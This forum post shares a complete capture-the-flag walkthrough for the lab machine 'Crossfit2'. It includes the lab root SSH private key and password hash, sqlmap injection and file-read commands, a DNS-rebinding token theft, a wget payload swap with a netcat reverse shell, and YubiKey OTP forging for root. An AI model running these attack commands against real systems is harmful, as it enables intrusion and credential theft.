FLAG Crossfittwo
by xFranky - May 03, 2021 at 10:02 AM
I have put the writeup here, but I would appreciate some help with coins.

also if u need something check here : https://shoppy.gg/@DarkHack







10.10.10.232



================= [ ALL REQUIRED FILES ] ====================



root id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----

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

-----END OPENSSH PRIVATE KEY-----







exploit.py

https://pastebin.com/sp3KL0LN





app.js

https://pastebin.com/M58anuzS





message.sh

https://pastebin.com/aXhZdfSz





john.sh

https://pastebin.com/eKLDkPXi





master.passwd

root:$2b$10$l5rjbTPLRlLAQzJ1brEg/eE9qtleDvcMXBlP3F6tdRytQ3QLXNZa.:0:0:daemon:0:0:Charlie &:/root:/bin/ksh





David ssh

david:NWBFcSe3ws4VDhTB



================= [ WRITEUP ] =====================

1) -- Portscan --



# Nmap 7.91 scan initiated Thu Mar 25 14:03:07 2021 as: nmap -Pn -sV -A -p- --min-rate=10000 -oN Crossfit2.nmap 10.10.10.232

Warning: 10.10.10.232 giving up on port because retransmission cap hit (10).

Nmap scan report for 10.10.10.232

Host is up (0.046s latency).

Not shown: 61643 filtered ports, 3890 closed ports

PORT  STATE SERVICE    VERSION

22/tcp open  tcpwrapped

| ssh-hostkey:

|  3072 35:0a:81:06:de:be:8c:d8:d7:27:66:db:96:94:fd:52 (RSA)

|  256 94:60:55:35:9a:1a:a8:45:a1:ae:19:cd:61:05:ec:3f (ECDSA)

|_  256 a2:c8:6b:6e:11:b6:70:69:db:d2:60:2e:2f:d1:2f:ab (ED25519)

80/tcp open  tcpwrapped

|_http-server-header: OpenBSD httpd

|_http-title: CrossFit

PORT    STATE SERVICE            VERSION

8953/tcp open  ssl/ub-dns-control?



--------------------------------------------------------------------------------------------





2) -- Directory Enum --



dirsearch -u http://10.10.10.232 -e *

dirsearch -u http://employees.crossfit.htb -e *



-- Result: http 200 --



http://10.10.10.232/css/

http://10.10.10.232/fonts/

http://10.10.10.232/img/

http://10.10.10.232/images/

http://10.10.10.232/index.php

http://10.10.10.232/index.php/login/

http://10.10.10.232/js/

http://10.10.10.232/readme.txt

http://employees.crossfit.htb/

http://employees.crossfit.htb/package-lock.json

http://employees.crossfit.htb/js/

/index.php

/index.php/login/

http://employees.crossfit.htb/css/

http://employees.crossfit.htb/password-reset.php

http://employees.crossfit.htb/password-reset.php?token=

http://gym.crossfit.htb



/images              (Status: 301) [Size: 510] [--> http://10.10.10.232/images/]

/js                  (Status: 301) [Size: 510] [--> http://10.10.10.232/js/]

/css                  (Status: 301) [Size: 510] [--> http://10.10.10.232/css/]

/img                  (Status: 301) [Size: 510] [--> http://10.10.10.232/img/]

/blog.php            (Status: 200) [Size: 15369]

/contact.php          (Status: 200) [Size: 8007]

/classes.php          (Status: 200) [Size: 25946]

/index.php            (Status: 200) [Size: 19041]

/fonts                (Status: 301) [Size: 510] [--> http://10.10.10.232/fonts/]

/about-us.php        (Status: 200) [Size: 15733]

/elements.php        (Status: 200) [Size: 19654]

/vendor              (Status: 301) [Size: 510] [--> http://10.10.10.232/vendor/]

/lgn                  (Status: 301) [Size: 510] [--> http://10.10.10.232/lgn/]

/index.php            (Status: 200) [Size: 19041]

---------------------------------------------------------------------------------



modify /etc/hosts --->



10.10.10.232 crossfit.htb employees.crossfit.htb gym.crossfit.htb







3) -- Test Websockets --



python3 -m websockets ws://gym.crossfit.htb/ws/



{"status":"200","message":"Hello! This is Arnold, your assistant. Type 'help' to see available commands.","token":"66c7fa72f1cab3e94d71139f8f21d8fe0ecd8b70ab0cace356cd7bdb2cfbd1bf"}



Available commands:

- coaches

- classes

- memberships ---> vulnerable parameter "params"



---------------------------------------------------------------------------------##





4) -- Exploit sqli --



WORKED!! ##



- Run script exploit.py:



python3 exploit.py



└─# python3 exploit.py

* Serving Flask app "exploit" (lazy loading)

* Environment: production

  WARNING: This is a development server. Do not use it in a production deployment.

  Use a production WSGI server instead.

* Debug mode: off

* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

------------------------------------------------------------------------------------





-- Parameter vulnerable to SQLi: "params" --



-- Run sqlmap against localhost:5000, which proxies the requests to the WebSocket ws://gym.crossfit.htb/ws/ --



sqlmap -u http://127.0.0.1:5000/?id=1  --dbs --level 5 --risk 3



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C username --dump



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C password --dump



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C email --dump



sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "employees" -T employees -C email,token --dump --fresh-queries --threads 10



------------------------------------------------------------------



-- Results of dumping the columns of the employees database --



Database: employees                                                                                                                                               

Table: employees

[4 entries]

+---------------+

| username      |

+---------------+

| administrator |

| jparker      |

| mwilliams    |

| wsmith        |

+---------------+



Database: employees

Table: employees

[4 entries]

+------------------------------------------------------------------+

| password                                                        |

+------------------------------------------------------------------+

| 06b4daca29092671e44ef8fad8ee38783b4294d9305853027d1b48029eac0683 |

| 4de9923aba6554d148dbcd3369ff7c6e71841286e5106a69e250f779770b3648 |

| fe46198cb29909e5dd9f61af986ca8d6b4b875337261bdaa5204f29582462a9c |

| fff34363f4d15e958f0fb9a7c2e7cc550a5672321d54b5712cd6e4fa17cd2ac8 |

+------------------------------------------------------------------+



Database: employees                                                                                                                                               

Table: employees

[4 entries]

+-----------------------------+

| email                      |

+-----------------------------+

| [email protected]  |

| [email protected]    |

| [email protected] |

| [email protected]    |

+-----------------------------+





5) -- Data exfiltration with sqlmap's --file-read function --



The data exfiltrated with sqlmap can be found here ----> /root/.local/share/sqlmap/output/127.0.0.1/files





-- First let's run this script --



python3 exploit.py ----> which proxies the requests to the WebSocket ws://gym.crossfit.htb/ws/





sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /etc/httpd.conf

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /etc/passwd

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/unbound.conf

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_server.key

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_control.pem

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_control.key

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /var/unbound/etc/tls/unbound_server.pem

sqlmap -u http://127.0.0.1:5000/?id=1  --level 5 --risk 3 -D "crossfit" -T "membership_plans" -C "password" --file-read /etc/relayd.conf







6) -- Part Configuration Unbound --



Put all the certificates under /etc/unbound on your machine





In the unbound.conf file, comment out the whole server section and replace the paths with the current paths of the certificates exfiltrated from the box



The unbound.conf file must look like this:



-------------------------------------------------------------

remote-control:

    control-enable: yes

    control-interface: 0.0.0.0

    control-use-cert: yes

    server-key-file: "/etc/unbound/unbound_server.key"

    server-cert-file: "/etc/unbound/unbound_server.pem"

    control-key-file: "/etc/unbound/unbound_control.key"

    control-cert-file: "/etc/unbound/unbound_control.pem"

    server-key-file: "/etc/unbound/unbound_server.key"

--------------------------------------------------------------





Run this control command:



unbound-control -c <path where you put my_unbound.conf> -s <target_ip>@8953 status



version: 1.11.0

verbosity: 1

threads: 1

modules: 2 [ validator iterator ]

uptime: 46 seconds

options: control(ssl)

unbound (pid 9554) is running...





------------------------------------------------------------------------------------------------







7) -- Part DNS Rebinding --



## There is a misconfiguration in the config file: there is a wildcard before the domain name, and we can use this to our advantage ##



-- Exploit Misconfig on relayd.conf



    pass request quick header "Host" value "*crossfit-club.htb" forward to <3>

    pass request quick header "Host" value "*employees.crossfit.htb" forward to <2>





Found New Domain:



## http://crossfit-club.htb  ##



xemployees.crossfit.htb ----> domain to add to the file /etc/hosts



Forward dns traffic via this command:



unbound-control -c my_unbound.conf -s <target_ip>@8953 forward_add +i fuckemployees.crossfit.htb. <your_ip>@53



Use a fake DNS server with this command:



i=0; dnschef -i <your_ip> --fakedomains xemployees.crossfit.htb --fakeip 127.0.0.1 2>&1 | while read line; do case "$line" in *cooking*) (( i++ )); echo $i;  [[ "$i" -gt 1 ]]  && pkill -f dnschef;; esac; done; dnschef -i <your_ip> --fakedomains xemployees.crossfit.htb --fakeip <your_ip>



Listen on netcat:

nc -nlvp 80



Token received:

connect to [<your_ip>] from (UNKNOWN) [10.10.10.232] 39907

GET /password-reset.php?token=9bb1cc830641bde976969ef85edc3f78b108c344bdbc0355b30749d5895803691a2f50a2534258fbb471f05fe4124bfda4d92bb1dd833a3aa8db4e9250055fc1 HTTP/1.1

Host: fuckemployees.crossfit.htb

User-Agent: Mozilla/5.0 (X11; OpenBSD amd64; rv:82.0) Gecko/20100101 Firefox/82.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Referer: http://crossfit-club.htb/

Upgrade-Insecure-Requests: 1



----------------------------------------------------------------



-- Enumeration crossfit-club.htb --



---- Scanning URL: http://crossfit-club.htb/ ----

+ http://crossfit-club.htb/chat (CODE:200|SIZE:4069)                                                                                                             

+ http://crossfit-club.htb/favicon.ico (CODE:200|SIZE:58784)                                                                                                     

+ http://crossfit-club.htb/home (CODE:200|SIZE:4069)                                                                                                             

+ http://crossfit-club.htb/index.html (CODE:200|SIZE:4069)                                                                                                       

+ http://crossfit-club.htb/login (CODE:200|SIZE:4069)







8) --- David User Part --



start Apache2:



service apache2 start



Install:

apt-get install uuid-runtime



-- Then run the script ./message.sh



Then after 2 minutes:



cat /var/log/apache2/access.log| grep -i david



SSH creds:

david:NWBFcSe3ws4VDhTB



cat access.log --->





10.10.10.232 - - [01/Apr/2021:14:13:06 -0400] "GET /RECV?data={%22sender_id%22:2,%22content%22:%22Hello%20David,%20I%27ve%20added%20a%20user%20account%20for%20you%20with%20the%20password%20NWBFcSe3ws4VDhTB.%22,%22roomId%22:2,%22_id%22:3075} HTTP/1.1" 404 490 "http://employees-crossfit.htb/a2ba575503da.html" "Mozilla/5.0 (X11; OpenBSD amd64; rv:82.0) Gecko/20100101 Firefox/82.0"





ssh david@<target_ip>



and then type sh to get a more usable shell









9) -- Privesc for user John --



The script app.js replaces the original one, which is invoked by the user john --->





Convert the script to Unix line endings:



dos2unix app.js



- Then we run these commands, quickly, because there is an automatic cleanup:



cd /opt/sysadmin

mkdir node_modules

cd node_modules

cp -r /usr/local/lib/node_modules/log-to-file .

cd log-to-file

rm app.js

wget <Your_IP>/app.js



or use my script john.sh --



wget <Your_IP>/john.sh

chmod +x john.sh

./john.sh



nc -nlvp 4444



--- And we have the shell with john!!!!





10) -- Privesc Root Part --





--Enum



find / -type f -perm -4000 -ls 2>/dev/null

1425624  52 -r-sr-xr-x    3 root    bin        26552 Oct  5 00:47 /usr/bin/chfn

1425624  52 -r-sr-xr-x    3 root    bin        26552 Oct  5 00:47 /usr/bin/chpass

1425624  52 -r-sr-xr-x    3 root    bin        26552 Oct  5 00:47 /usr/bin/chsh

1425650  56 -r-sr-xr-x    1 root    bin        27464 Oct  5 00:47 /usr/bin/doas

1425715  60 -r-sr-sr-x    1 root    daemon      29936 Oct  5 00:47 /usr/bin/lpr

1425716  52 -r-sr-sr-x    1 root    daemon      24880 Oct  5 00:47 /usr/bin/lprm

1425743  44 -r-sr-xr-x    1 root    bin        20936 Oct  5 00:47 /usr/bin/passwd

1425809  36 -r-sr-xr-x    1 root    bin        17216 Oct  5 00:47 /usr/bin/su

1478072  20 -r-sr-xr-x    1 root    bin          8880 Oct  5 00:47 /usr/libexec/lockspool

1478095  960 -r-sr-xr-x    1 root    bin        466608 Oct  5 00:47 /usr/libexec/ssh-keysign

1481580  20 -rwsr-s---    1 root    staff        9024 Jan  5 13:04 /usr/local/bin/log

1503426  48 -r-sr-sr-x    2 root    authpf      23000 Oct  5 00:47 /usr/sbin/authpf

1503426  48 -r-sr-sr-x    2 root    authpf      23000 Oct  5 00:47 /usr/sbin/authpf-noip

1503506  288 -r-sr-x---    1 root    network    146208 Oct  5 00:47 /usr/sbin/pppd

1503559  64 -r-sr-xr-x    2 root    bin        32712 Oct  5 00:47 /usr/sbin/traceroute

1503559  64 -r-sr-xr-x    2 root    bin        32712 Oct  5 00:47 /usr/sbin/traceroute6

362927  736 -r-sr-xr-x    2 root    bin        356768 Oct  5 00:47 /sbin/ping

362927  736 -r-sr-xr-x    2 root    bin        356768 Oct  5 00:47 /sbin/ping6

362934  576 -r-sr-x---    1 root    operator  275928 Oct  5 00:47 /sbin/shutdown



setuid:

1481580  20 -rwsr-s---    1 root    staff        9024 Jan  5 13:04 /usr/local/bin/log







11) -- exploit /usr/local/bin/log to read files that john is not permitted to read --





Found the root keys and root id_rsa ---> save them to files; we will need them later to get a root SSH shell:



/usr/local/bin/log /var/db/yubikey/root.key

6bf9a26475388ce998988b67eaa2ea87 ----> root.key



/usr/local/bin/log /var/db/yubikey/root.uid

a4ce1128bde4 ----> root.uid





/usr/local/bin/log /var/db/yubikey/root.ctr

985089 ----> root.ctr



/usr/local/bin/log /var/backups/root_.ssh_id_rsa.current



chmod 600 id_rsa





-- Download the software -------> https://developers.yubico.com/yubico-c/



extract the tar.gz file and...



sudo apt-get install libtool

sudo apt-get install dh-autoreconf

sudo autoreconf --install

sudo apt-get install asciidoc-base

./configure

make check

sudo make install



12) --- Generate Yubikey password and root shell---


./ykgenerate $(cat root.key) $(cat root.uid) $(printf "%06x" $(expr $(cat root.ctr) + 1) | sed 's/..$//g') c0a8 00 $(printf "%06x" $(expr $(cat root.ctr) + 1) | sed 's/^....//g')

drugnrenllteribiibulbvenukcitnbv


why people take and dont give me a respect or some coins for give free a insane machine :( bad guys no support no more free :((( sorry bad day
Hey Frank, excellent write up. Keep it up.
 Thanks and Respect.
thanks buddy for the excellent write up keep up the good work. +rep for you :D
thanks guys for respect i appreciate that thanks guys
Franky, I need some help with the dnschef portion of the writeup: I can't get that command to work for me. I am also new to this whole DNSChef and DNS rebinding thing; I've read a couple of articles, so can you explain it in a bit more detail? Thank you in advance.
I think this has been explained and is understandable, so if you need an explanation, I think you have enough information to be able to do it yourself. If I give the machine away for free and on top of that I have to become a professor for free ....... that's not funny.